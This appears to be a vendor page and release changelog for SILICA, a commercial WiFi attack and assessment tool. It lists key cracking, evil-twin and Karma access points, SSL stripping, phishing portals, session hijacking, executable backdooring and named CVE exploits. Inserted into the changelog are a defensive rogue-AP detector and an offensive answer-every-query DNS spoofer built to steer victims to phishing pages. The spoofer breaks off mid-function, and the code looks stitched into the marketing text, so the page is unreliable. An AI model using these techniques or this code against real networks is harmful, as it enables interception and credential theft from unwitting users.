The industry de facto wireless security assessment tools and systems
Understanding the vulnerabilities of your WiFi network can be challenging as users can easily create networks on demand, or even perhaps unintentionally. But as recent events have demonstrated, scanning your WiFi network is an important part of understanding your security posture.
Most vulnerability assessment tools simply take their existing network scanners and point them at the wireless infrastructure. This approach does not give you the information that is unique to wireless networks. Immunity has built the first automated, WiFi-specific vulnerability assessment and penetration tool.
Unlike traditional scanners that merely identify possible vulnerabilities, SILICA determines the true risk of a particular access point. SILICA does this by unobtrusively leveraging vulnerabilities and determining which assets behind the vulnerable access point can be compromised.
Additionally, while traditional scanners can enumerate the vulnerabilities of a particular target, they cannot evaluate whether a mitigating control is in place on the target or in the surrounding environment. With SILICA’s unique methodology it can report on whether a vulnerability can be successfully exploited.
More than simple scanning, the benefits of using SILICA include:
- Improved security posture
- Simplified troubleshooting
- Network mapping
- Create real threat profiles and vulnerability assessments
- Build WiFi risk and vulnerability analysis for PCI, SOX, HIPAA
- Rogue access point detection
- Auditing wireless client security
SILICA Benefits Statement
With SILICA you can:
- Recover WEP, WPA 1,2 and LEAP keys
- Passively hijack web application sessions for email, social networking and Intranet sites.
- Map a wireless network and identify its relationships with associated clients and other access points.
- Identify vendors, hidden SSIDs and equipment passively.
- Scan and break into hosts on the network using integrated CANVAS exploit modules and commands to recover screenshots, password hashes and other sensitive information.
- Perform man-in-the-middle attacks to find valuable information exchanged between hosts.
- Generate reports for wireless and network data.
- Hijack wireless client connections via access point impersonation.
- Passively inject custom content into clients’ web sessions.
- Take full control of wireless clients via CANVAS’s client-side exploitation framework (clientD).
- Decrypt and easily view all WEP and WPA 1/2 traffic.
Typical SILICA users include:
1. Forensics teams working to re-create an incident.
2. Security Management teams that want a purpose-built vulnerability scanning and exploitation tool for their WiFi network, including remote identification of systems and mobile devices even when running personal firewalls.
3. Network administrators who want to discover ad-hoc, unauthorized clients, or weakly authenticated WiFi access points, and to test/recover WEP, LEAP and WPA 1,2 keys.
4. Compliance officers looking for real risk management profiles.
5. Security Assessment teams that are tired of the false positives from traditional scanners and want SILICA’s man-in-the-middle and aggressive remote exploitation capability.
SILICA Functionality and Product Features
- Access Point recon and analysis
- Automated client discovery
- Access Point exploits
- Automated exploit launch and run
- Automated SSID discovery
- WEP, WPA 1/2 and LEAP credential recovery
- WPS attacks, including offline bruteforcing
- Man-In-The-Middle capability
- Fake AP attacks, including KARMA, SSL-Strip, Spoofed Certificates and Service Impersonation
- Browser Session Hijacking
- Number of hosts analyzed simultaneously: 256
- Average time to compromise a host: < 1 minute
- Average time to break a WEP network: 10 minutes
- Average time to break a LEAP, WPA 1/2 network: depends on key strength
- Report Format: HTML, DOCX
- Report retrieval: USB
- Frequency ranges: 802.11 a/b/g/n
- Installation: Virtual Machine
- Wireless cards: Alfa AWUS052NH Dual-Band Wireless USB Adapter (included)
SILICA is based on Ubuntu 14.04 LTS 64-bit and is supplied as a virtual machine.
Included with SILICA is a high-performance Alfa WiFi USB adapter that greatly improves wireless performance over the base WiFi chipsets built into most commercial laptops.
This self-contained solution provides support for 802.11 a/b/g/n networks. This product is ideal for security personnel who wish to integrate WiFi testing into an existing test platform with our security testing tools.
Feel free to contact E-SPIN for your operation or project requirement.
Silica Latest Build And Release
From here onward, build and release information is listed in reverse chronological order, latest first.
2020-Feb-21 SILICA v7.40!
– Windows CryptoAPI Spoofing (CVE-2020-0601)
A spoofing vulnerability exists in the way Windows CryptoAPI
(Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.
SILICA will try to exploit this vulnerability to spoof SSL certificates
with the “FakeAP with service impersonation” module.
– NETGEAR Telnet Enable Vulnerability
Several NETGEAR routers have a telnet daemon that can be enabled
remotely and accessed with default credentials. SILICA will try to
exploit this vulnerability with the “Attack” module and use it to
obtain credentials for the router’s HTTP Console.
– Apple EAP-success attack (CVE-2019-6203)
There is a vulnerability in Apple devices that allows an attacker to
create fake access points that successfully spoof real access points.
This works by sending EAP-success messages that the Apple devices accept
even before validating credentials. SILICA will exploit this
vulnerability when creating a FakeAP with 802.1X encryption.
– Fix missing “edit key” submenu option for 802.1X networks.
Videos can be found at:
Network Printer Attacks –
https://vimeo.com/270182796
Bypassing WPA2 encryption using the KRACK attack –
https://vimeo.com/251369829
SILICA 7.31: Samba Server Exploitation –
https://vimeo.com/230656937
D-link and Microsoft WSUS Exploits –
https://vimeo.com/209259981
Fake Captive Portal Demo –
https://vimeo.com/198045435
Malicious Access Point Detection –
https://vimeo.com/177231337
Karma attack filtering and background WPA handshake sniffer –
https://vimeo.com/165882825
Access Point Mapping – https://vimeo.com/157178038
Full Karma Attack – https://vimeo.com/155393829
SMB proxy and group policy exploit – https://vimeo.com/136964755
SSL attacks using SSL stripping and self signed certificates –
https://vimeo.com/122117823
Exploiting Android WebView.addJavaScriptInterface –
http://vimeo.com/109831748
Pixie Dust WPS Attack – https://vimeo.com/130883860
More WPS attacks – https://vimeo.com/album/338505
General overview –
http://www.immunityinc.com/mov
Wireless Window –
http://www.immunityinc.com/mov
2019-Nov-21 SILICA v7.39!
– WPA/WPA2 client-less attack using PMKID
SILICA now supports WPA/WPA2 bruteforcing using PMKID data. This allows
SILICA to attack access points even when no stations (clients) are
present. When running the “Discover key” module, SILICA will try to
connect to the Access Point and parse the response for RSN PMKID data.
If present, it will store the handshake and commence bruteforcing
immediately. SILICA will also passively detect and capture any WPA
handshakes with PMKID data.
– DDE Close Handle Local Privilege Escalation (CVE-2019-0803)
An elevation of privilege vulnerability exists when Windows improperly
handles closing an object’s handle in Dynamic Data Exchange (DDE). This
module will be run by SILICA automatically after a successful
exploitation.
2019-Jul-17
– APT Remote Code Execution Exploit (CVE-2019-3462)
This module exploits a vulnerability in apt to achieve remote code
execution. The vulnerability is caused by incorrect sanitization of the
302 redirect field in the HTTP transport method of apt versions 1.4.8
and earlier. This attack will be used with the “Become this network
with client-side injection” action, when the “transparent HTTP proxy”
option is set. If a client joins the network, and tries to install a
package using apt, the attack will be performed. In order for it to
succeed, apt should download release files (Release.gpg).
– Fixes an issue that prevents SILICA from joining certain WEP networks.
2019-Mar-29 SILICA v7.37!
– Neighborhood Graph Visualization:
This new visualization allows the user to view a graph of related
networks, Access Points, SSIDs, and client devices for a given
wireless device. This graph can be useful for looking for rogue
access points, or for figuring out how to attack an access point by
attacking its stations.
– DHCP client Command Injection Exploit:
This module exploits a command injection flaw in the Network Manager
script included in the DHCP client packages in Red Hat Enterprise
Linux. This module will try to exploit the vulnerability in devices
that join SILICA’s Fake AP.
– Improved KRACK attack detection:
SILICA will passively sniff for encrypted WPA traffic and try to
decrypt it using an all-zero key. If the decryption succeeds, the
BSSID of the encrypted traffic will be shown in red in the Malicious
Access Point Detection tab.
– Updated OUI database.
2019-Jan-15 SILICA v7.36!
– FakeAp Mana Mode:
The FakeAp karma option now implements the attack known as “mana”:
build a per-MAC view of the proximate network list, and respond to
broadcast probes with direct responses for each network in that list.
This attracts more client devices than the previous karma
attack.
– EAP Relay Attack:
When trying to connect to a network using 802.1X authentication, SILICA
will now launch an EAP Relay Attack if the credentials are unknown.
This attack will allow SILICA to join the network after a
man-in-the-middle attack on a legitimate client device trying to join
the network.
Notes: two wireless cards are needed for this attack, and this attack
only works on PEAP-EAP-MSCHAPv2 at this time.
2018-Sep-17 SILICA v7.35!
– Updated embedded Canvas version with additional exploits:
+ CVE-2017-0143 – Windows SMB Remote Kernel Pool Overflow
The “Attack” module will now launch the ETERNALBLUE exploit. This
module was tested with Windows 7 X86 and X64 targets.
+ CVE-2017-11906 – WPAD/PAC Exploit via JScript Heap Overflow
The “Service impersonation” module will now launch the WPAD exploit
when a station joins the Fake Access Point. This module was tested
with Windows 10 X64 targets.
– Important bugfix: Fix issue with WEP cracking module that could
result in out-of-memory errors.
2018-Aug-2 SILICA v7.34!
* Updated SILICA VM:
This release adds support for the new SILICA VM. The new VM is based on
Xubuntu and includes updated system software.
* Additional wireless card support:
Now SILICA supports wireless cards based on the MediaTek RT5572 chipset.
Notice:
This SILICA version can only be installed on the latest version of the VM.
2018-May-17 SILICA v7.33!
* Printer exploitation:
When SILICA finds a network printer, it will show the PJL volumes in a
file browser. This feature allows the user to explore directories, download
files, and exploit path traversal vulnerabilities in the printer’s file
system.
* Attack Tree Tab:
A new visualization was added that shows scan and attack results in a
centralized manner.
* This release also includes:
Changes to the Network Probe module. SILICA will now show more
information about scanned network devices, including open ports and
service properties.
Several bug fixes, including one in the “custom channel list” feature.
2018-Jan-18 SILICA v7.32!
* KRACK attack: bypassing WPA2 encryption
SILICA can now perform a man-in-the-middle attack between a target
access point and the target devices that try to connect to the network.
When a vulnerable device tries to connect, SILICA will intercept the
packets and replay them in a way that will cause the device to install
an all-zero encryption key. SILICA will then carry on with SSL-stripping
and SSL-spoofing attacks against the target device.
This module’s supported targets are wpa_supplicant 2.4 and 2.5, and it was
tested on a stock Ubuntu 16.04.1 target.
Also included in this release:
Updated certificates for Fake AP in radius mode.
Compatibility fixes to the DHCP server.
Important Note: To make the KRACK attack work, SILICA requires two
wireless cards, as the fake access point needs to be on a different
channel than the real Access Point. The additional card could be any
wireless card that supports packet injection, however, Immunity will
*only* support the Alfa AWUS052NH 802.11n Dual Band 2.4/5 GHz Wi-Fi USB
Adapter which can be obtained here:
https://store.rokland.com/pro
https://www.amazon.com/Alfa-L
To view a demonstration of the new features visit:
https://vimeo.com/251369829
2017-Aug-24 SILICA v7.31!
* Exploit module for SAMBA Remote Code Execution vulnerability.
This module exploits a vulnerability in SAMBA servers (CVE-2017-7494).
In order to use this exploit you need: write access to a SAMBA share,
and named pipes should be enabled in the SAMBA server. This module
was tested on Samba 4.1.6 (x86-64 and i386) on Ubuntu.
* Improved post-exploitation module for Linux.
After a Linux host is exploited, the post-exploitation module will now
extract saved WiFi credentials from the Network Manager, and screenshots
will be taken and saved in BMP format.
* Improved logging and status information.
A status information table shows information about current and past
actions started by the user. An error log tab was also added. Important
log entries are now shown in a different color.
Important bug fix: issue with the card not being detected in some OSX
hosts was fixed.
To view a demonstration of the new features visit:
https://vimeo.com/230656937
2017-Jun-2 Immunity is proud to announce the release of SILICA v7.30!
* Improved support for enterprise configured networks
SILICA now can connect to access points using 802.1X authentication.
This can be combined with different modules, including network probing,
attack, and ARP-spoofing. The supported authentication modes are
EAP-TLS, EAP-PEAP, and EAP-TTLS. The supported second phase
authentication modes are PAP, MSCHAP, MSCHAPV2, and GTC.
* Signal strength graph for wireless clients
A new option was added to show the signal strength graph of a wireless
client of an access point. The signal strengths of all transmitted
packets are plotted. To improve the graph, control frames are sent to
elicit responses from the station.
* Updated WPA word-list
An updated 1 million words list for WPA handshake cracking is included
in this release.
* Important Bugfix: Now clients from access points are correctly
classified as wired or wireless.
2017-Mar-21 SILICA v7.29!
* Windows Server Update Services (WSUS) MiTM Attack
A new attack module that performs a man-in-the-middle attack against
Windows stations using non-SSL connections to WSUS. This module is
active when running the fake AP with client-side injection mode.
* D-link authentication bypass
Multiple D-link access points are vulnerable to an authentication
bypass [1]. The “attack” module will scan for the vulnerability and
open a browser session to the administration interface if the attack
is successful.
* Deauthentication of wireless clients
A new option was added to deauthenticate a specific station from a
wireless network. This can be useful to try to force a target to
connect to the fake AP.
* A new option was also added to select the channel used by the fake AP.
* In addition, several fixes are included:
Issue with packet injection in MiTM mode with client-side injection.
Issue with network listing information display when an AP
configuration is changed.
To view a demonstration of these new features visit:
2017-Jan-4 SILICA v7.28!
* Fake Captive Portal
A new feature was added to the FakeAp with Service Impersonation
module. When the captive portal option is set, all HTTP traffic
from mobile devices that associate to the fake access point is
redirected to a sign-in page, until the user enters any
credentials, which are logged to the passwords tab.
* Internet connectivity spoofing with FakeAp
The FakeAp with Service Impersonation module will now spoof Internet
connectivity, so when mobile devices join the fake access point, they
will behave as if they are connected to the Internet, even if SILICA
is not.
* Improvements to the DHCP client and server used by SILICA.
* Changes to how modules are started and stopped. Now SILICA feels more
responsive.
Note: support for the Ubiquiti SR71-USB wireless card is discontinued
since this release. The only supported wireless card is the Alfa
AWUS052NH Dual-Band Card.
To view a demonstration of these new features visit:
Fake Captive Portal Demo –
https://vimeo.com/198045435
2016-Oct-13 SILICA v7.27!
In this SILICA release we have ramped up our client-side exploitation
capabilities, including our most successful CANVAS exploits.
We added client-side exploitation capabilities to HTTP traffic on
encrypted networks in FakeAP. We also include some updates to our
post-exploitation capabilities, upgrading our WiFi key dumper to support all
Windows versions.
Enjoy it!
Changelog:
– Updated embedded Canvas version, including new clientside exploits:
* adobe_flash_id3 (CVE-2015-5560, targeting Adobe Flash <= 18.0.0.209)
* adobe_flash_intoverflow_apply (silently patched in Adobe Flash >
17.0.0.169)
* adobe_flash_domainMemory_uaf (CVE-2015-0313)
* ms16_006_silverlight
– Clientside exploits will now also be injected in HTTP traffic when in
encrypted FakeAp mode.
– Wifi key dumper post exploitation module now supports all windows
versions and now saves the recovered keys in the “passwords” tab
– Probe responses are now used to identify hidden SSIDs
– Bug fixes:
* issue with channel hopping in the AP Mapping Module
* issue with Canvas output processing
* issue with Canvas post-exploitation setting
2016-Aug-2 v7.26!
– Malicious AP Detection
SILICA will analyze probe requests and probe responses looking for
possible malicious access points. Any access point possibly spoofing
a valid SSID will be reported to the user, along with the reason
that the access point is suspicious.
– Improvements for the AP mapping feature
Large floor images are now fully supported, as they are resized to
fit in the user interface, but still shown in full size when
exporting a mapping image. Also, an option was added to hop across
channels when making a site survey.
– Change on the main buttons
The “START” button was renamed “SCAN”, and now allows scanning even
when performing some other actions.
The “STOP” button is now enabled while a stoppable activity is
running.
– Fixed issue with the man-in-the-middle module.
To view a demonstration of these new features visit:
https://vimeo.com/177231337
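As an added illustration of the kind of heuristics behind the rogue and malicious access point detection described above (this is example code written for this page, not SILICA’s own implementation), the following Python detector runs over constructed beacon and probe-response summaries. It assumes a simple dict-per-frame format, a constructed list of the organisation’s own OUI prefixes, and a threshold for the number of distinct SSIDs a single BSSID may answer probes for; all three are assumptions, not SILICA settings.

```python
"""Heuristic rogue / malicious access point detector.

Added example for this page, not SILICA code. It flags two patterns that the
Malicious AP Detection feature above is concerned with:
  1. an access point advertising a known SSID from an unrecognised vendor OUI,
     possibly with a weaker security mode than the legitimate APs use
     (evil-twin style spoofing of a valid SSID);
  2. a single BSSID answering probe requests for many unrelated SSIDs, the
     signature of a Karma/mana-style fake AP.
"""
from collections import defaultdict

# Constructed sample frames (field names are an assumption of this example).
# A real sniffer would fill these from parsed beacon / probe-response frames.
FRAMES = [
    {"type": "beacon", "bssid": "00:11:22:aa:bb:01", "ssid": "CorpWiFi", "security": "WPA2"},
    {"type": "beacon", "bssid": "00:11:22:aa:bb:02", "ssid": "CorpWiFi", "security": "WPA2"},
    # An open AP from an unknown vendor prefix advertising the corporate SSID.
    {"type": "beacon", "bssid": "de:ad:be:ef:00:01", "ssid": "CorpWiFi", "security": "OPEN"},
    # One BSSID answering probes for several unrelated networks.
    {"type": "probe_resp", "bssid": "de:ad:be:ef:00:02", "ssid": "CorpWiFi", "security": "OPEN"},
    {"type": "probe_resp", "bssid": "de:ad:be:ef:00:02", "ssid": "HomeNet", "security": "OPEN"},
    {"type": "probe_resp", "bssid": "de:ad:be:ef:00:02", "ssid": "CoffeeShop", "security": "OPEN"},
    {"type": "probe_resp", "bssid": "de:ad:be:ef:00:02", "ssid": "AirportFree", "security": "OPEN"},
    # A legitimate AP answering a directed probe for its own SSID is normal.
    {"type": "probe_resp", "bssid": "00:11:22:aa:bb:01", "ssid": "CorpWiFi", "security": "WPA2"},
]

# Constructed: OUI prefixes (first three octets) of the organisation's own APs.
AUTHORIZED_OUIS = {"00:11:22"}
# Assumed threshold: answering probes for this many distinct SSIDs is suspicious.
KARMA_SSID_THRESHOLD = 3


def oui(bssid):
    """Return the vendor OUI prefix of a MAC address, normalised to lowercase."""
    return bssid.lower()[:8]


def analyze(frames, authorized_ouis=AUTHORIZED_OUIS, karma_threshold=KARMA_SSID_THRESHOLD):
    """Return a sorted list of (bssid, reason) findings for suspicious APs."""
    beacons_by_ssid = defaultdict(dict)      # ssid -> {bssid: security mode}
    probe_ssids_by_bssid = defaultdict(set)  # bssid -> set of SSIDs it answered for
    for f in frames:
        if f["type"] == "beacon":
            beacons_by_ssid[f["ssid"]][f["bssid"].lower()] = f["security"]
        elif f["type"] == "probe_resp":
            probe_ssids_by_bssid[f["bssid"].lower()].add(f["ssid"])

    findings = []

    # Rule 1: a known SSID (one beaconed by a trusted OUI) also beaconed by an
    # untrusted BSSID, optionally with a different security mode.
    for ssid, aps in beacons_by_ssid.items():
        trusted = {b: s for b, s in aps.items() if oui(b) in authorized_ouis}
        if not trusted:
            continue  # nothing to compare against; SSID is not one of ours
        trusted_modes = set(trusted.values())
        for bssid, mode in aps.items():
            if bssid in trusted:
                continue
            reasons = [f"unknown OUI {oui(bssid)} advertises SSID {ssid!r}"]
            if mode not in trusted_modes:
                reasons.append(f"security {mode} differs from trusted {sorted(trusted_modes)}")
            findings.append((bssid, "; ".join(reasons)))

    # Rule 2: one BSSID answering probes for many different SSIDs.
    for bssid, ssids in probe_ssids_by_bssid.items():
        if len(ssids) >= karma_threshold:
            findings.append((bssid, f"responds to probes for {len(ssids)} different SSIDs: "
                                    + ", ".join(sorted(ssids))))

    return sorted(findings)


def flagged_bssids(frames, **kwargs):
    """Convenience wrapper: the set of BSSIDs with at least one finding."""
    return {bssid for bssid, _ in analyze(frames, **kwargs)}


if __name__ == "__main__":
    for bssid, reason in analyze(FRAMES):
        print(f"SUSPICIOUS {bssid}: {reason}")
```

A real deployment would replace the constructed frame list with parsed 802.11 management frames and tune the OUI list and threshold to the environment.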
2016-May-10 v7.25!
– Background WPA handshake sniffer
SILICA will always be listening for WPA handshakes. The captured
handshakes can be used later for cracking the pre-shared key using a
dictionary attack. Only the last valid handshake is stored for each
AP, older ones are discarded. A visual indication for Access Points
for which a handshake has been captured is displayed in the Network
Listing Tab.
– SSIDs and MACs filters in Karma Mode
Allows full control of which network names are spoofed in Karma Mode,
and which stations are allowed to join the fakeAp.
– Better support for radius in fakeAP:
* Authentication attempts are logged and the hashes stored on the
password tab.
* Return EAP-Success to try to get clients to log in to our fakeAP.
– Better logging of stations actions (association, connection,
disconnection) when in fakeAP mode.
– Fixed issue with the wordlist generator.
To view a demonstration of these new features visit:
https://vimeo.com/165882825
2016-Mar-1 SILICA v7.24!
– Access Point Location Capture (Rogue AP detection).
With this new feature you can create a site survey, recording the signal
strength of the beacons emitted by all the access points in a given
channel as you walk around the facility. This feature can be used to
detect unauthorized access points.
– Access Point Signal Mapping.
Using the readings from the site survey, visualize the signal strength
with various representations.
– Access Point Signal Strength Graph.
This feature shows a real-time graph of the signal strength for an
access point. It can be useful for quickly determining an access point
location using a directional antenna, or to better position your card
for communicating with the access point.
Bugfix: now the transparent HTTP proxy logs all tokens matching the
interesting keyword regular expression, so it’s more probable to log the
correct credentials.
For any questions or support please email silica@immunityinc.com
To read more about the access point signal mapping feature visit:
http://immunityproducts.blogsp
To view a demonstration of these new features visit:
https://vimeo.com/157178038
2015-Dec-4 SILICA v7.23!
– Full KARMA mode for fake AP. When this option is activated, SILICA
will create a Fake Access Point for each probe request instead of only
impersonating one SSID
– Support for wireless cards based on the Ralink RT3572 chipset. SILICA
will now ship with the Alfa AWUS052NH Dual-Band Wireless USB Adapter.
This card is more sensitive and has better compatibility with 802.11n
networks than the previous one. This is a major improvement in range,
compatibility and reliability of the product. SILICA will also continue
to support the Ubiquiti SR-71 card (which is still a great card).
– New GUI dialogs for better selecting Fake AP’s settings. ASCII WEP
keys are now supported and SILICA will warn the user when invalid keys
are set.
– Added preferences option to set wireless regulatory domain.
– Add an option to filter Credential Capture by domain name.
– Fixed performance issue with WPA hash brute forcing.
– Fixed driver issue that caused reduced throughput in Fake AP mode.
Immunity will support the old wireless card, but we encourage all our
customers to switch to the new card. We will be providing the card
upgrade to all our clients at cost and if you happen to need a license
renewal, a shiny new Alfa card will be included.
2015-Sep-9 SILICA v7.22!
– Group Policy Exploit for Microsoft Windows (MS15-011)
Tested on Windows 7 targets joined to Windows 2008 R2 domain
controllers (DC). The SILICA VM’s host should be on the same network
as the DC, meaning packets should be able to reach the DC, and
the DNS server address should point to the DC. This exploit was tested
while on FakeAp with service impersonation mode. When successful, this
module will make changes to some registry values under
HKEY_LOCAL_MACHINE\SOFTWARE\Mi
on the target.
– SMB Transparent Proxy
When running a FakeAp with service impersonation, SILICA intercepts all
SMB packets. SMB traffic accessing “.exe” files will be modified to
include backdoors. This works as long as mandatory SMB signing is not
enabled on the target.
– Use-after-free in Adobe Flash Player (CVE-2015-5119)
This release also includes some bug fixes, including:
– Issue with ARP scanning in man-in-the-middle/main-in-the-
– Issue with FakeAp module when handling large number of connections.
– Issue with FakeAp with service impersonation module with slow DNS
resolving.
To view a demonstration of the SMB proxy and group policy exploit visit:
https://vimeo.com/136964755
2015-Jun-18 SILICA v7.21!
– WPS offline bruteforcing (AKA Pixie Dust Attack)
Access Points using Ralink chipsets lack randomization of the E-S1 and
E-S2 nonces. This attack will do an offline brute force of the WPS PIN,
reducing the time that it usually takes to obtain the Access Point
credentials.
– New WPS option “try only default PINs”
When this menu option is selected, only the fastest WPS attacks are
carried out.
– Denial of service enhancement
The “Disable this network” module will now send a continuous stream of
deauthentication packets.
– Bug Fixes:
Issue that prevented connection to some WLANs using WPA encryption.
Issue with the WPS bruteforcing module.
Wireless channel selection fixes.
To view a demonstration of the Pixie Dust Attack visit:
https://vimeo.com/130883860
2015-Apr-7 SILICA v7.20!
– SSL Stripping
This new module performs a man-in-the-middle attack
against stations connected to the fake access points. HTTP traffic is
modified on the fly to change HTTPS links to HTTP. Cookies are
expired to force the targets to re-authenticate, with the
intention of obtaining user names and passwords.
– Self Signed Certificates
The new module performs spoofed SSL certificate attacks. The HTTPS
traffic is intercepted using self-signed certificates. Successfully
decrypted traffic is parsed for cookies and
user/password combinations.
– Bug Fix: Better handling of module stopping.
– Accomplice Plug-in Fixes
2014-Dec-24 SILICA v7.19!
– – Executable replacement: This new fake AP capability allows for new
attack possibilities. In this release, it intercepts executables downloaded by
stations and replaces them with backdoors (works on Windows, Linux and OSX).
– – Improved WPS attack: SILICA will exploit default PINs for vulnerable
access points before brute-forcing, including trying algorithms that
derive the PIN from Access Point properties (such as the MAC).
2014-Oct-24 SILICA v7.18!
– – New client side exploit for Android’s WebView addJavascriptInterface
Remote Code Execution (CVE-2013-4710). This is handled automatically by
SILICA’s Fake-AP module.
– – New filtering feature added. Supply a list of newline-separated MAC
addresses for the main wireless AP window and FakeAP tab. This way a
tester can track devices that only are registered with a particular company.
– – New feature to use CANVAS MOSDEF listeners. This feature is
implemented for the Android’s WebView addJavascriptInterface Remote Code
Execution Exploit.
2013-May-23 SILICA v7.17!
– – New probe window:
+ Added a color-coded “easy to exploit” factor for probe requests that takes
into account the following information:
. Common name of probe request
. Signal level of client
. Last seen time
. If there is a key
+ Added new columns:
. Probe count, allows us to determine if a client is still probing
for a network
. Channel, for better replication of fake AP
. Quality, signal levels to see if the client is distant
. Last time seen
+ Added coloring code of how active a client is, follows the same
scheme as the network listing window
+ Added column sorting similar to the network listing window
– – Dynamic SSL certificate creation based on the detected CNAME of the
connecting host and caching
– – New HTTPs module for fake answers, captures BasicAuth/OAuth
credentials, SSL Cookies, automatic phishing for all popular websites:
Facebook, Twitter, Gmail, Amazon, Ebay, Hotmail, Yahoo, Linkedin,
Pandora etc. It can be extended to work with any website.
– – New SMTPs module for fake answers, captures emails and the following
authentication methods:
+ CRAM-MD5, getting the username and encrypted password
+ LOGIN, getting the username and password
+ PLAIN, getting the username and password
Also extended supporting STARTTLS dynamic socket upgrade to SSL
– – New POP3s module for fake answers, captures login credentials
– – New IMAPs module for fake answers, captures login credentials
– – Updated fake DNS module to intelligently send back responses to
clients. The logic is that if any of the fake answer modules has
captured useful information the DNS module will then send the real IP
and allow continuation of service instead of delivering our IP,
increasing the sophistication of the attack and making it seamless to
clients.
– – New key recovery method for VPN credentials. If the VPN fake answers
module captures a handshake it can then be loaded to the offline key
recovery tab to find the password.
– – New key recovery tab now automatically identifies the type of the
capture file and loads the right module. It supports the following key
recovery options:
+ LEAP
+ WPA1,2
+ VPN
– – Added new preference option to set a static IP instead of using DHCP
2013-May-3 SILICA v7.16!
– – Added exploit for Java Dynamic Type Binding Remote Code Execution
(CVE-2013-2423)
Modules extended:
+ Become this network with client side injection:
– AP mode
– Ad-Hoc mode
+ Man-In-The-Middle with client sides
+ Passive session hijacking selectively attack a client
– – Bug fixes in service impersonation modules
Videos can be found at:
Password stealing –
http://partners.immunityinc.co
AP less WEP cracking –
http://silica.immunityinc.com/
Access point impersonation –
http://partners.immunityinc.co
Custom traffic injection –
http://partners.immunityinc.co
General overview –
http://www.immunityinc.com/mov
Wireless Window –
http://www.immunityinc.com/mov
Key retrieval (WEP, LEAP, WPA1,2) –
http://partners.immunityinc.co
Passive session hijacking (facebook, twitter, gmail etc) –
http://partners.immunityinc.co
2013-Feb-22 SILICA v7.15!
– – New VPN module for fake services under fake AP. This module will
impersonate a VPN PPTP server and answer the authentication request by
any client. Once the request is captured the username and the
challenge/response will be saved in the Reports directory and shown in
the information tab under passwords. The attack has been tested with
the native OS integrated software in the following platforms:
+ Android 4.x (tablet and phones)
+ IOS 5/6 (tablet and phones)
+ Mac OSX Snow Leopard and Mountain Lion (might work with other
versions too)
+ Windows 7 and XP (might work with other versions too)
+ Linux Network Manager
– – Added exploit for MBeanInstantiator.findClass Remote Code Execution
(CVE-2013-0422) in MITM and Injection modules
– – Added support for reading PKI (airpcap, kismet etc.) PCAPs
2013-Dec-12 SILICA v7.14!
– – New mode cookie react. Automatically opens chrome with an active
session in popular websites (instagram, facebook, aol, linkedin, amazon,
ebay, hotmail, yahoo etc)
– – ACCOMPLICE, new google chrome plugin that allows session hijacking
and cookie modifications
– – Automatically save the HTML contents of the active react sessions
and upload them into STALKER
– – Single sign on (SSO) enumeration using ACCOMPLICE plugin (currently
works only on facebook)
– – Custom list of channels for channel hopping
– – WPA passive session hijacking now logs both the server and client
data, which can be used for more STALKER information
– – Updated reports to use the latest CANVAS reporting engine
– – Added more websites for fake service impersonation (amazon, ebay,
linkedin, hotmail). Usernames/Passwords are now shown along with the IP
address we captured the data from.
– – Recovered keys are now stored in a database and are loaded automatically
– – Automatic notification for SILICA updates if there is an internet
connection
2012-Oct-18 SILICA v7.13!
– – Ability to disable an access point using a denial of service attack
and all the connected clients
– – Automatic resuming when uploading large pcap’s to STALKER
– – POP/SMTP/IMAP credentials and emails are now displayed in the GUI in
the Fake AP service impersonation
– – Improved passive session hijacking for WEP and WPA networks
– – Updated OUI file, 20000 new wireless vendors
– – Updated firmware
2012-Sep-15 SILICA v7.12!
– – STALKER support (https://stalker.immunityinc.c
+ Option to automatically upload captured SILICA data from:
. Passive session hijacking
. Fake Access Point and Ad-Hoc mode
. Traffic Rewrite modes
+ Ability to upload Pcap’s from SILICA GUI:
. Ethernet wired Pcap’s
. Wireless with or without radiotap header
+ STALKER mode to force redirection and collecting more data
– – Fake Access Point and Ad-Hoc mode support RADIUS-like credential
capturing for attacking WPA1,2 and WEP enterprise configured networks
(PEAP, LEAP)
– – Fake Access point and Ad-Hoc mode with phishing attack capabilities:
+ Capture HTTP usernames and passwords for:
. Facebook and Facebook Mobile
. Twitter
. Gmail (does not work against Google-Chrome)
+ Capture IMAP credentials
+ Capture any SMTP emails the user tries to send
+ Answer all DNS queries
+ Capture POP3 credentials
+ Easter-egg for Pandora mobile Apps (iphone and android maybe more!)
– – New VMware image with an improved wireless driver. Please note the
old VMware image will still be supported but updates for it will be
discontinued as of the next SILICA release. Contact
[email protected] to receive an updated version.
– – Intelligent difficulty rating for attacking a network, shown as a
color next to the network name
– – New ClientD exploit for the Java forName/getField method invocation
sandbox bypass (CVE-2012-4681)
– – New option to allow Wireshark sniffing on a particular channel
– – Updated the WPA cracking C module with more statistics about progress and ETA
Please note this update may take longer than usual to complete when
executing the post actions.
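The "Answer all DNS queries" item above is the piece of the Fake AP that makes the phishing pages reachable: whatever hostname the victim's client resolves, it gets the fake AP's own address back. The responder below is an added example written for this page, not SILICA's own (unpublished) Fake AP code. It speaks the bare DNS wire format with no upstream resolver, the addresses and hostnames are constructed, and `serve()` is the only part that touches a socket.

```python
"""Answer-everything DNS responder, as used by a fake access point.

Added example (not SILICA code): every A query from a connected client is
answered with the fake AP's own address, so whichever hostname the victim
types, the impersonated page is what they reach. Other query types get an
empty NOERROR reply so the client does not fall back to another resolver.
The IPs and hostnames used here are constructed.
"""
import socket
import struct
from typing import Optional, Tuple

QTYPE_A = 1
HEADER = struct.Struct("!HHHHHH")   # id, flags, qdcount, ancount, nscount, arcount


def encode_name(name: str) -> bytes:
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00'."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """Client-side query (RD set); used here to construct sample traffic."""
    return HEADER.pack(txid, 0x0100, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(data: bytes) -> Optional[Tuple[int, str, int, bytes]]:
    """Return (txid, name, qtype, raw question section) or None if not a usable query."""
    if len(data) < HEADER.size:
        return None
    txid, flags, qdcount, _, _, _ = HEADER.unpack_from(data)
    if flags & 0x8000 or qdcount < 1:          # QR set: a response, not a query
        return None
    labels, pos = [], HEADER.size
    while True:
        if pos >= len(data):
            return None
        n = data[pos]
        pos += 1
        if n == 0:
            break
        if n & 0xC0 or pos + n > len(data):    # no compression pointers in a query name
            return None
        labels.append(data[pos:pos + n].decode("ascii", "replace"))
        pos += n
    if pos + 4 > len(data):
        return None
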